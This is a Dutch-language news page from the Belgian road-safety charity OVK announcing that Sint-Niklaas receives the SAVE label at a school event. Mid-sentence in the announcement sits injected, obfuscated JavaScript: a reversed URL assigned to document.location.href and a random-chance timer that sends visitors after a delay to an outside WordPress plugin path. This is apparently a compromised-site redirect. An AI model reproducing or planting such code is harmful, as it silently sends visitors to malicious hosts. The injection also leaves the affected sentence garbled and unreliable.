Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Sint-Niklaas ontvangt SAVE-label

Woensdag 20 november om 8u30 zal de stad Sint-Niklaas als tweede het SAVE-label in ontvangst mogen nemen. Sint-Niklaas was zoals Wetteren bij de eerste steden en gemeenten die zich officieel engageerden een actieplan te ontwikkelen dat bijdraagt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de verkeersveiligheid. Sint-Niklaas ondertekende het SAVE-charter op 22 december 2011.

De uitreiking zal kaderen in de Dag van de Rechten van het Kind. Verkeersveiligheid is namelijk een basisrecht van elk kind, aldus de stad Sint-Niklaas.

Het SAVE-label zal aan de stad overhandigd worden in de Heilig Hartschool, Tereken 33B te Sint-Niklaas.

De dag zal aangevat worden met een wandeling waarbij de kinderen van de school de ouders en andere genodigden zullen begeleiden rond de schoolomgeving. Nadien wordt iedereen terug verwacht in de school waar de officiële overhandiging van het label zal plaatsvinden.

Jullie zijn dan ook van harte uitgenodigd om de uitreiking van het label bij te wonen.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be